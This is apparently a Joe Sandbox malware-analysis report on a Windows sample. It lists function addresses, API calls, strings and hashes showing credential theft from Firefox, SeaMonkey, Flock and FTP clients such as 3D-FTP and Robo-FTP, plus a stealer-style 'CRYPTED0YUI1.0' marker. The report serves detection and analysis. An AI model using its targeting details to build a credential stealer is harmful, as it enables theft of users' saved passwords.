Instruction ID: b0ad2cfb46005793c0c0abe5dd3ab5746b162f93cc5fb6bfc144e89947cd2d14
Opcode Fuzzy Hash: 514fa578dfee4ba82bfb5fa4791be43d1ddf10ba2a0a50f6d9ab5609a06e0caa
Instruction Fuzzy Hash: DB21F9B1840118FADF21AB90CC02BED77B9AF40308F0480B7A655750A1DB79AB95DF99

Function 00401A63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401A76
GlobalLock.KERNEL32(?), ref: 00401A91

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

GlobalUnlock.KERNEL32(?), ref: 00401AB9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401AC1

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

CRYPTED0YUI1.0, xrefs: 00401AF2

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
String ID: CRYPTED0YUI1.0
API String ID: 4083238039-1217275205
Opcode ID: bd3919a52a1e2bdfbf7140e69235c6026d4d8811ef6e730f5db43e14d8b7a2e6
Instruction ID: c0153cecf658e2022cfbe4c23f1f27468bc0d5f7d6a7bb3d229d95f63e470793
Opcode Fuzzy Hash: bd3919a52a1e2bdfbf7140e69235c6026d4d8811ef6e730f5db43e14d8b7a2e6
Instruction Fuzzy Hash: 1011C97190010DBBDF026FE1CC42CDD7F7AAF10348F00807AB915B50B2D77A9AA1AB58

Function 0040E63E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E651
RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E68A
StrStrIA.SHLWAPI(?,.wjf), ref: 0040E6D1
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E6FE

Strings

.wjf, xrefs: 0040E6C6

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpenValue
String ID: .wjf
API String ID: 4012628704-198459012
Opcode ID: 845ae2bd0b9a97d66b0dd1607ffb49ea1f95a1c64f969f1219966797e9f728f6
Instruction ID: 1c63f224acb28aac00906c0b99f7b4c2dea3cefb9db1523bc3fa0221065386cd
Opcode Fuzzy Hash: 845ae2bd0b9a97d66b0dd1607ffb49ea1f95a1c64f969f1219966797e9f728f6
Instruction Fuzzy Hash: 50112E7281000CFACF119B91CC02BDDBBB9BF10304F4488B6B515B11A1DB799AA59F98

Function 004047EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00402844: GetTempPathA.KERNEL32(00000104,?), ref: 0040287A
Part of subcall function 00402844: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028FC
Part of subcall function 00402844: GlobalLock.KERNEL32(?), ref: 00402908
Part of subcall function 00402844: GlobalUnlock.KERNEL32(?), ref: 0040292A

CoCreateGuid.OLE32(?,00000000), ref: 0040480F
wsprintfA.USER32 ref: 00404856
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404862

Strings

HWID, xrefs: 004047F6, 0040486C
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 0040484D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1852535927-1100116640
Opcode ID: b7b028101add646b24eb2c313dd6bafe52ef84dede1830d4a27c51306838e557
Instruction ID: df54e70fc0e8366707f7b91954caf3fefd6b263816b42dbb75c049cb81f3a1b9
Opcode Fuzzy Hash: b7b028101add646b24eb2c313dd6bafe52ef84dede1830d4a27c51306838e557
Instruction Fuzzy Hash: 88110CA68141987DDB61E2F68C15EFFBBFC5909205B1400A7B6A0F2082E67DD740DB38

Function 0040A008 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A036

Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A07B

Strings

Software\Mozilla, xrefs: 0040A045, 0040A062
\Mozilla\Firefox\, xrefs: 0040A03B, 0040A058
Firefox, xrefs: 0040A040, 0040A05D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: b051bf477c61d08f413ac179833e1cd328482dc73794cfc8887449b3799d09ca
Instruction ID: 2ad02519c29ffec47796f1de9b44df3f2de04b3b295ee020e8f54bd766fd6585
Opcode Fuzzy Hash: b051bf477c61d08f413ac179833e1cd328482dc73794cfc8887449b3799d09ca
Instruction Fuzzy Hash: B2F01D70680609FACB10EB51CC53FCD7A699F90788F204166B608B50E2DBF95AD0DB9C

Function 0040A145 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A173

Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A1B8

Strings

Software\Mozilla, xrefs: 0040A182, 0040A19F
SeaMonkey, xrefs: 0040A17D, 0040A19A
\Mozilla\SeaMonkey\, xrefs: 0040A178, 0040A195

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: babff25430e4f365ea0e2014d95ba9808793be354daf6e31b05222e32a6df86d
Instruction ID: 9fe71bc26396215c61a75a3107301519d848e6ab75275e33a641b6866ab1e780
Opcode Fuzzy Hash: babff25430e4f365ea0e2014d95ba9808793be354daf6e31b05222e32a6df86d
Instruction Fuzzy Hash: 9DF0F970A81609FACB10EB51CC46FCD7A699F90788F204066B604B50E2DBF95AD0DA9C

Function 0040A1CC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A1FA

Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A23F

Strings

Software\Mozilla, xrefs: 0040A209, 0040A226
\Flock\Browser\, xrefs: 0040A1FF, 0040A21C
Flock, xrefs: 0040A204, 0040A221

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: ee61de0c382090adc2765c5d1035e2767923c845b80061751cb4b5679c4cf616
Instruction ID: 3c1e3bb89bc4743297c5096db4720c44fb7e1e70c6b984c046b142b0982cf536
Opcode Fuzzy Hash: ee61de0c382090adc2765c5d1035e2767923c845b80061751cb4b5679c4cf616
Instruction Fuzzy Hash: ACF01D70694608FACB10FB51DC43FCD7A699B90748F204066B644B50E3DBF95AD0DB9C

Function 0040A253 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A281

Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A2C6

Strings

Software\Mozilla, xrefs: 0040A290, 0040A2AD
\Mozilla\Profiles\, xrefs: 0040A286, 0040A2A3
Mozilla, xrefs: 0040A28B, 0040A2A8

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: 01877a481b4b215b5d64b5c6ac5329170623aa1f9e40f533c9b037501c5977e4
Instruction ID: 8df44532bde05e65d7ba4226275c4343473a842cd46792264138c0cb17815f64
Opcode Fuzzy Hash: 01877a481b4b215b5d64b5c6ac5329170623aa1f9e40f533c9b037501c5977e4
Instruction Fuzzy Hash: 50F01D70680609FACB11EF51CC47FCD7B699B94748F204066B604B50E2EBF96AD1DB9C

Function 0040CD17 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00542E18,3D-FTP), ref: 0040CD3E

Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

3D-FTP, xrefs: 0040CD38
\SiteDesigner, xrefs: 0040CDB2
\3D-FTP, xrefs: 0040CD83
sites.ini, xrefs: 0040CD57, 0040CD94, 0040CDC3

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: ccb832f8d6294ba54f81485a60962b0762f8e89fe3feef3c0128095ca51d499c
Instruction ID: 11f2e4e829d6b45beb417fccaf5cead2cde491bac4b3eda310811c49aac8815d
Opcode Fuzzy Hash: ccb832f8d6294ba54f81485a60962b0762f8e89fe3feef3c0128095ca51d499c
Instruction Fuzzy Hash: 0111A3B1980201B9EB30BB71CC03FAF3D599F60744F15463BB918B11E2DA7CDA5192AC

Function 0040B199 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040B1AF
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B1E3
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B2CB

Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF6C
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF7F
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF92
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFA5
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFB8
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFCB
Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFDE

Strings

SiteServers, xrefs: 0040B21D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: be8a98160c99f38d5d3a29f49b07001e0fa052176103d7a4bfd3339d7d78f9f1
Instruction ID: ff345f41e9badcc5242353447f49ba9d611c8c99c40e21d3bd177640c75f1bb7
Opcode Fuzzy Hash: be8a98160c99f38d5d3a29f49b07001e0fa052176103d7a4bfd3339d7d78f9f1
Instruction Fuzzy Hash: D5310A7180011CEADF21AB90CC06BDEB6B9FF14308F04C0FAA558750A0CB795B96AFD9

Function 00401811 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 00401821
GlobalLock.KERNEL32(?), ref: 0040183C

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

GlobalUnlock.KERNEL32(?), ref: 0040189A

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

PKDFILE0YUICRYPTED0YUI1.0, xrefs: 004018A9

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$Local$AllocFreeFromLockStreamUnlock
String ID: PKDFILE0YUICRYPTED0YUI1.0
API String ID: 1329788818-258907703
Opcode ID: f73d219993267b487340a13a54df57fa29eb117144a87e821d9b47dadb07df4c
Instruction ID: b54e30c2f35457a0d89ca7f82b145ff6d4e454c91772d0bd22442afcf9acda1e
Opcode Fuzzy Hash: f73d219993267b487340a13a54df57fa29eb117144a87e821d9b47dadb07df4c
Instruction Fuzzy Hash: 3E2110B2D00109BEDF027FE1CC42AEE7F75AF10348F10407AB911741B1E77A9AA0AB49

Function 00408FE6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408FF9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040902D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004090CC

Strings

MRU, xrefs: 00409065

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: 77bb93efd1dc01be4c22ef4fe79974cbfc34de44d470b6e3180a8fcc01a456e5
Instruction ID: d3c31817ab902d619976ccceadcbdc0c8f00580900e2f9513ecd0cfeff69c874
Opcode Fuzzy Hash: 77bb93efd1dc01be4c22ef4fe79974cbfc34de44d470b6e3180a8fcc01a456e5
Instruction Fuzzy Hash: 1D21CA7190020DBADF11AF91CC02BDE7AB9BF04308F14C5BAB554750E1DB795B91AF98

Function 00401CC9 Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401D0E
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D29
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D5F
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D81

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: ed4dade05a9476d331bd24acdcb83bf85bf762a37cfe1399fd73b813753ace6b
Instruction ID: 9816e780ba7a9b61ac8f10edf5f76657af6701c34893a948d0a8da9b8a2ff839
Opcode Fuzzy Hash: ed4dade05a9476d331bd24acdcb83bf85bf762a37cfe1399fd73b813753ace6b
Instruction Fuzzy Hash: E2215C32600109EFDF218E94CD42BEF3BB9AF40354F144076F910A61B0D779EA90EB59

Function 0040C0C9 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 85stringCOMMON

Download Yara Rule

APIs

lstrcmpiA.KERNEL32(00000000,logins), ref: 0040C107
lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040C13C

Part of subcall function 0040BDB5: StrStrIA.SHLWAPI(?,() ), ref: 0040BDC5

Strings

logins, xrefs: 0040C0FF
table, xrefs: 0040C137

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: ae73111b52554dd352ddf764a8fc3e8b7643c4bf1a7e0bb623022541fdad65b7
Instruction ID: 44bd49cda4f83470fcc6d087c12488a2d232518bbed9fb0e32f53c5fc095cd4e
Opcode Fuzzy Hash: ae73111b52554dd352ddf764a8fc3e8b7643c4bf1a7e0bb623022541fdad65b7
Instruction Fuzzy Hash: 6F31E676900209EACF21DF94CC81EDE7B7DAB05324F10836BE220B51E1DB748B559F98

Function 00407287 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

"password" : ", xrefs: 004072D1, 004072E4

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 9b66fc8c2ed78cf3003a553049269c39b999698440f48ec520a91f01cf9785ee
Instruction ID: 6fd9b49c0107d758d70eaf6d8f3db433f834a372e2ed034e7c7f64373fa2119f
Opcode Fuzzy Hash: 9b66fc8c2ed78cf3003a553049269c39b999698440f48ec520a91f01cf9785ee
Instruction Fuzzy Hash: C221C272C04109BEDF016BA1CC02DEE7B65AF50344F10007BF911B61A2D67D5E51E75A

Function 0040D589 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040D5D3

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Strings

SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D598, 0040D5E1
FTP File%d, xrefs: 0040D5CA
FTP Count, xrefs: 0040D593

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: f7d49a8ad72f4cf21b3d6b377b94dc2bbb24e2f34b5d06e0204dfc3f5d2330a9
Instruction ID: 9b64ce6408ec8dffd8ed150ebec05a6cd99c907ea882324556334bfe4ac7b373
Opcode Fuzzy Hash: f7d49a8ad72f4cf21b3d6b377b94dc2bbb24e2f34b5d06e0204dfc3f5d2330a9
Instruction Fuzzy Hash: D7015E75D40208BEDF00AAD1CC02AEF7BB9AB50308F114077F415B11D1D77E9B989A68

Function 0040124C Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040125E
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401282
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040128E

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 78ec933cabe2413ae98f15933a1fd9dbc01acc641919ace9920baa8db8525e39
Instruction ID: 15506b23c571d90703829774804d106b072a5722cba8c36d8149df187c584029
Opcode Fuzzy Hash: 78ec933cabe2413ae98f15933a1fd9dbc01acc641919ace9920baa8db8525e39
Instruction Fuzzy Hash: FEF0EC71A50108BAEF21AB90DC13FEEBA68AB14749F1040A6B144F90E1D6B99BD4DB14

Function 00401E34 Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401E55
lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

